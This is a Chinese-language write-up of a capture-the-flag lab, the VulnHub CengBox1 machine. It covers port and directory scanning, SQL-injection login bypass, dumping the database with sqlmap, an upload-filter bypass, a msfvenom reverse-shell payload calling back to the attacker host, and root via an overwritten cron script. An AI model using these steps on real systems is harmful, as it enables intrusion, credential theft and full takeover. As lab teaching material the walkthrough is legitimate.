美文网首页Vulnhub...
VULNHUB靶机 CENGBOX1

VULNHUB靶机 CENGBOX1

作者: doinb1517 | 来源:发表于2022-01-27 13:17 被阅读0次

    题目描述

    desc.png

    官方连接

    解题记录

    Reconnaissance

    使用namp扫描主机

    nmap -sT 192.168.1.11
    
    01.png

    发现80和22端口开放,尝试访问

    02.png

    尝试目录爆破

    dirsearch -u http://192.168.1.11
    dirb http://192.168.1.11 /usr/share/wordlists/dirb/big.txt
    

    扫描出以下几个

    http://192.168.1.11/masteradmin
    http://192.168.1.11/index.php
    

    直接访问http://192.168.1.11/masteradmin显示403继续扫描该目录下的php后缀的文件

    http://192.168.1.11/masteradmin/login.php
    http://192.168.1.11/masteradmin/upload.php
    

    访问http://192.168.1.11/masteradmin/login.php,发现登录页面

    loginin.png

    Execution

    直接尝试一下sql注入,直接进入上传页面。再使用sqlmap查看数据库名

    login_burp.png
    sqlmap -r login.txt --dbs 
    
    dbs.png

    爆破表

    sqlmap -r login.txt -D cengbox --dump
    
    table.png

    继续回到上传页面,上传一个php一句话木马,失败,页面左上角有提示,这个提示的颜色和背景色很像,不注意根本看不到,根据提示修改后缀为.ceng上传。

    upload_err.png

    生成payload,上传成功。

     msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.2 lport=1234 -o re_shell.ceng
    
    upload_success.png

    获取shell,发现用户cengover,使用数据库中发现的密码连接

    get_shell.png find_user.png

    尝试连接


    cengover.png

    发现cengover的flag

    cengflag.png

    Privilege Escalation

    使用pspy提权, Github

    pspy.png

    找到一个可用的

    MD5.png

    查看该文件的读写权限,

    ls.png

    生成反弹shell,写入/opt/md5check.py

    msfvenom.png

    msfconsole等待连接即可,得到root权限

    root.png

    相关文章

      网友评论

        本文标题:VULNHUB靶机 CENGBOX1

        本文链接:https://www.haomeiwen.com/subject/jfkahrtx.html